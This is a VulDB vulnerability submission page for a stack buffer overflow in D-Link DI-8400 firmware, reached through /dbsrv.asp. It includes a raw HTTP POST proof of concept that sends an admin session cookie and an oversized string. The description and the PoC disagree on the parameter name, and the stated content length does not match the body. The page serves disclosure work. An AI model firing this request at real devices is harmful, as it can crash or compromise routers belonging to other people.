提交 #821716: D-Link DI-8400 <=v16.07.26A1 Buffer Overflow信息

标题	D-Link DI-8400 <=v16.07.26A1 Buffer Overflow
描述	A critical stack-based buffer overflow vulnerability has been identified in D-Link DI-8400 firmware version 16.07.26A1. The vulnerability is triggered via crafted HTTP POST requests to the /dbsrv.asp endpoint. Specifically, user-controlled input supplied through the src parameter is copied using the unsafe strcpy function without proper bounds checking, leading to a buffer overflow condition. Successful exploitation may allow an attacker to cause a denial of service condition or potentially achieve arbitrary code execution on the affected device. POC： POST /dbsrv.asp HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:143.0) Gecko/20100101 Firefox/143.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: wysLanguage=CN; userid=admin; gw_userid=admin,gw_passwd=E3A7F1B4C8D2E5F7A0B3C6D9E1F4A7B2 Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 26 str=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbh
来源	⚠️ https://github.com/666324/dlink-di8400-vuln/tree/main/dlink-di8400-vuln
用户	Zheng (UID 97999)
提交	2026-05-07 09時46分 (28 日前)
管理	2026-05-31 08時40分 (24 days later)
状态	已接受
VulDB条目	367486 [D-Link DI-8400 直到 16.07.26A1 /dbsrv.asp str 内存损坏]
积分	20

◂ 上一步一览下一步 ▸

Do you need the next level of professionalism?

Upgrade your account now!